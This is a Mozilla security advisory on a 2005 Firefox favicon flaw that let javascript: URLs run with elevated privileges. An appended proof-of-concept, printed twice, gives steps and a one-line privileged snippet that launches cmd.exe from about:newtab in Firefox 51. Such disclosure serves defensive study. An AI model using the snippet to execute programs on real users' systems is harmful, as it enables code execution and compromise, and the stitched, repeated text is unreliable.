Code execution through javascript: favicons
- Announced
- April 15, 2005
- Reporter
- Michael Krax
- Impact
- Critical
- Products
- Firefox, Mozilla Suite
- Fixed in
- Firefox 1.0.3
- Mozilla Suite 1.7.7
Description
Firefox and the Mozilla Suite support custom "favicons" through the <LINK rel="icon"> tag. If a link tag is added to the page programmatically and a javascript: url is used, then script will run with elevated privileges and could run or install malicious software.Workaround
Disable javascript.PoC Test : Firefox lastest version 51.0.1(32bit)
1. Open new tab (about:newtab)
2. Execute the code below using WebConsole (Hold CTRL+SHIFT+K)
---------------------------------------------------------------
f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()
---------------------------------------------------------------
'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.
Here is an example:
https://www.mozilla.org/en…/security/advisories/mfsa2005-37/
original source:
https://twitter.com/Qab/status/806891824354836480
f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()
---------------------------------------------------------------
'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.
Here is an example:
https://www.mozilla.org/en…/security/advisories/mfsa2005-37/
original source:
https://twitter.com/Qab/status/806891824354836480
